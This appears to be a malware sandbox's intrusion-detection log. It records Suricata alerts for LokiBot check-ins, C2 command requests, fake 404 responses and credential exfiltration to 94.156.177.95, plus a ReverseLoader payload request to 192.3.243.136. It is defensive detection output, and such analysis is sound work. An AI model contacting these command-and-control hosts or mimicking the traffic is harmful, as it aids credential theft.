                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49761 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.5:49748 -> 192.3.243.136:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49801 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49815 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49790 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49815 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49771 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49815 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49766 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49766 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49766 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49827 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49856 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49801 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49815 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49815 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49795 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49776 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49776 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49776 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49766 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49815
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49811 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49795 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49790 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49820 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49795 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49776 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49776 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49785 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49785 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49801 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49795 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49785 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49795 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49811 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49811 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49801 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49856 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49856 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49811 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49771 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49820 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49801 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49771 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49875 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49875 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49820 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49776
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49889 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49889 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49889 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49827 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49905 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49811 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49925 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49925 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49880 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49856 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49807 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49807 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49807 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49807 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49807 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49785 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49905 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49905 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49785 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49905 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49905 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49925 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49790 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49880 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49856 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49880 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49925 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49925 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49795
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49925
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49905
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49820 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49790 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49807
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49856
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49771 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49880 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49801
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49839 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49839 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49839 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49909 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49880 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49771 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49889 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49839 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49875 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49790 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49839 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49875 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49875 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49827 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49785
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49909 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49880
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49941 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49909 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49999 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49935 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49935 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49935 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49771
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49875
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49811
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50022 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49909 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49999 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49909 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49999 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49851 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50022 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50022 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49851 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49851 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50022 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49839
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50022 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49851 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49851 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49820 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49790
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49827 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50038 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50038 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50038 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50033 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49941 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49827 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50014 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49909
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50014 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50014 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49999 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50038 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49845 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50022
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50033 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50014 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50033 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50014 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49827
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49935 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50040 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50040 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49845 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49845 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50028 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49941 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50035 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50035 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50053 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50035 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49941 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49941 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50038 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49869 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50040 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49869 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50041 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50041 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50044 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50028 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49889 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49897 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49897 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49851
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50053 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50053 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50033 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49869 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50033 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50028 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50029 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49820
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50053 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50026 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50028 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50026 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50028 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50026 -> 94.156.177.95:80
